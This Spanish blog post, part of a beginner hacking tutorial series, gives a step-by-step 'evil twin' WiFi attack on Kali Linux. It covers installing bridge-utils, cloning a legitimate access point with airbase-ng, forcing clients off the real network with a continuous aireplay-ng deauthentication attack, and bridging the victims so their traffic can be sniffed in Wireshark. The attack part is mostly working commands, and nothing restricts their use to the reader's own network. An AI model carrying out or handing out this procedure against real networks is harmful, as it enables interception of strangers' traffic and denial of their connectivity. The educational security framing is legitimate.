Notice: La función wp_enqueue_script ha sido llamada de forma incorrecta. Los scripts y estilos no se deberían registrar o poner en cola hasta que se carguen los ganchos wp_enqueue_scripts, admin_enqueue_scripts y login_enqueue_scripts. Este aviso ha sido activado por la gestión de nfd_wpnavbar_setting. Por favor, ve depuración en WordPress para más información. (Este mensaje fue añadido en la versión 3.3.0). in /home1/spotsail/public_html/martra/wp-includes/functions.php on line 6078
Clonando un punto de acceso WiFi. Y instalar bridge-utils en Kali, que no es poco. – Pere Martra
No se han encontrado widgets en la barra lateral
Esto es un puente bonito y no las bridge-utils que son feas feas...

Los puntos de acceso WiFi falsos son muy peligrosos, existen, y cualquiera puede ser víctima de ellos.

Estamos ya en la séptima entrada del tutorial de hacking básico Poco a poco hemos ido viendo temas cada vez más interesantes, pero todavía estamos tan solo rascando la superficie. Aunque la verdad es que si has seguido los posts anteriores, los has entendido y probado y has conseguido que funcionasen las técnicas explicadas ya empiezas a tener unos conocimientos importantes. Muchos más de los que puede tener cualquier profesional de IT que no se dedique a la ciberseguridad.

¿No te lo crees? Vamos a ver todo lo que hemos visto hasta ahora, y solo nos ha costado unas cuantas horas: tutorial:
Hemos montado un laboratorio de seguridad con Kali Linux. Hemos visitado la deep web. Realizado un escaneo de puertos. Atacado una WiFi por fuerza bruta, generando millones de contraseñas. Atacado el punto débil de las WiFi, llamado WPS. Finalmente hemos montado un Man In The Middle que era incluso capaz de capturar la contraseña de Facebook….
Es bastante, en serio, es mucho! Vamos a por mas: esta vez vamos a montar un punto de acceso wifi falso, clonando un punto de acceso legítimo. ¿Que para qué sirve? Lo veremos.

EVIL Twin, Clonando una WiFi

Por primera vez en el tutorial nos falta una herramienta en Kali Linux, lo primero que vamos a hacer es instalarla, y por si este tutorial es vuestra primera experiencia con linux, ahora entenderemos que no todo es tan sencillo como en windows o mac.

Esto es un puente bonito y no las bridge-utils que son feas feas…

Instalando bridge-utils

La herramienta a instalar es bridge-utils, pero no hay una forma sencilla de instalarla, pero como cada distribución de Kali mejora probemos con lo más sencillo a ver si funciona a lo primero.
[code language=”shell”]
apt-get install bridge-utils
[/code]
¿Ha funcionado? Perfecto! Ya está!!!!
¿Os saca un mensaje diciendo que no tiene ni idea de que es esto de bridge-utils? Pues tenemos que realizar lo ssiguientes pasos:

  • Editemos el fichero /etc/apt/sources.list
    [code language=”shell”]
    nano /etc/apt/sources.list
    [/code]
    Borramos el contenido del fichero y ponemos:
    [code language=”shell”]
    # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ – Official Snapshot i386 LIVE/INSTALL $
    # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ – Official Snapshot i386 LIVE/INSTALL $
    ## Security updates
    deb http://http.kali.org/ /kali main contrib non-free
    deb http://http.kali.org/ /wheezy main contrib non-free
    deb http://http.kali.org/kali kali-dev main contrib non-free
    deb http://http.kali.org/kali kali-dev main/debian-installer
    deb-src http://http.kali.org/kali kali-dev main contrib non-free
    deb http://http.kali.org/kali kali main contrib non-free
    deb http://http.kali.org/kali kali main/debian-installer
    deb-src http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-fr$
    [/code]
    Con esto le indicamos a Kali donde tiene que ir a buscar los packages de instalación y actualización.
  • Limpiar la cache de apt. Es la herramienta de instalación de packages que vamos a utilizar, y cómo hemos cambiado los directorios donde irá a buscarlos, pues mejor dejarlo limpio como una patena.
    [code language=”shell”]
    apt-get clean
    apt-get update
    apt -f install
    [/code]
    Con esto ya hemos dejado apt y los diferentes package instalados como nuevos, el proceso puede tardar un poco, depende de los packages que tengamos instalados y lo desactualizados que esten.
  • Instalar bridge-utils.
    [code language=”shell”]
    #apt-cache search bridge
    [/code]
    con esto buscamos entre los paquetes que conoce apt, todos los que contengan la palabra bridge, si localizamos a bridge-utils es que ya podemos realizar la instalación.
    bridge-utils package apt
    Aquí vemos como apt encuentra a bridge-utils entre los package que se pueden instalar.

    [code language=”shell”]
    apt-get install bridge-utils
    [/code]

Ya está!!!! Por Fin! Ya tenemos las bridge-utils y ya podemos empezar a clonar el punto de acceso.

Clonando la WiFi.

Lo primero es poner nuestro interface de red en modo monitor, ya lo hemos hecho en casi todos los anteriores post, recordemos cómo:
[code language=”shell”]
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
[/code]

Igual que en los post anteriores ahora toca matar todos los procesos que pueden interferir con nuestra tarjeta de red.
[code language=”shell”]
airmon-ng check wlan0
[/code]
Esta orden nos devolverá una lista de los procesos que están usando la tarjeta de red. Cada proceso tendrá un PID. Lo que tenemos que hacer es matar todos los procesos listados con el comando kill.
[code language=”shell”]
kill 451
kill 650
[/code]
Estos dos comandos mataran los procesos 451 y 650, el PID de vuestros procesos no tiene porqué coincidir con los míos, y pueden ser unos cuantos más de dos. Lo importante es que después de matar todos los procesos volváis a ejecutar airmon-ng y la lista que os devuelve tiene que estar vacía.

Amntes de lanzar el comando que duplicará el punto de acceso necesitamos conocer algunos datos suyos, como el ESSID y BSSIB. lo obtenemos con el comando airodump-ng wlan0.
[code language=”shell”]
airodump-ng wlan0
[/code]

Lista de puntos de acceso obtenidos con airodump-ng
Lo que nos devuelve airodump-ng (He ocultado MAC y ESSID)

Con este listado ya tenemos todos los datos necesarios, ahora ya podemos lanzar el comando que duplicará la red. Concretamente vamos a necesitar, el BSSID, el CH y el ESSID.
[code language=”shell”]
airbase-ng -a 72:01:71:41:A0:19 –essid MIRED_WIFI -c 13 wlan0
[/code]
Con esto crearemos nuestro accespoint!!! Lo que pasa es que tenemos a todo el mundo conectado al accespoint anterior, así que tendremos que hacer algo para que se conecten al nuestro. Lanzamos un ataque de deautenticación para que los clientes al volverse a autenticar lo hagan en nuestro punto de acceso y no en el original.
[code language=”shell”]
aireplay-ng -0 0 -a 72:01:71:41:A0:19 wlan0
[/code]
Con esto los clientes tendrían que irse desconectando del accespoint original y reconectarse al nuestro, siempre y cuando nuestra señal sea más fuerte que la original.

Y entonces ¿porqué narices hemos instalado las bridge-utils? Bueno, ahora tenemos a los clientes conectados a nuestro accespoint, pero los clientes no tienen acceso a internet, tenemos que montar un bridge entre nuestro falso accespoint y el de verdad.

[code language=”shell”]
brctl addbr eviltest
brctl addif eviltest wlan0
brctl addif eviltest at0
ifconfig at0 0.0.0.0 up
dhclient eviltest
[/code]
Lo primero que hacemos es crear eviltest, le podemos poner cualquier nombre. Después relacionamos el interface recién creado con el interface en nuestra máquina con conexión a Internet, en este caso wlan0. Continuamos conectando eviltest con el interface que nos ha creado airbase, que se llama at0. Levantamos at0 y activamos eviltest.

Ahora ya podemos usar wireshark para poder ver el tráfico de los clientes que se nos han conectado.

Viendo el tráfico de la red con wireshark.

Wireshark es tan complejo que necesita de un tutorial para él solo y está totalmente fuera del ámbito de este pequeño tutorial. En Internet hay multitud de información de esta suite. Por ahora ya podemos empezar a jugar creando filtros y buscando la información que queremos encontrar. Aunque ya os avanzo que no vais a ver el tráfico encriptado, que por algo está encriptado!!

Recordad que este post forma parte del tutorial de Hacking / Pen Testing Básico

CEH 01 Examen de test para el Certified Ethical Hacker

Primer examen de test para la certificación del ec-council Certified Ethical Hacker (CEH).

Como hacer un Man In The Middle con SSLStrip (Así se roban las contraseñas)
Man in the Middle SSLStrip

Es uno de los ataques más míticos, el ponernos entre un cliente y un servidor sin que ninguno de los Read more

Montando un laboratorio de Ethical Hacking o “Cyber Security Laboratory I’m really cool”

Me encanta el nombre de Laboratorio de Ciberseguridad, cada vez que lo leo me entran ganas de comprarme una Bata Read more

Preparando nuestro ciberlaboratorio para jugar con los SQL Injection

En esta octava entrada del tutorial de hacking básico vamos a preparar nuestro kali linux para empezar a jugar con Read more

Por Martra

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *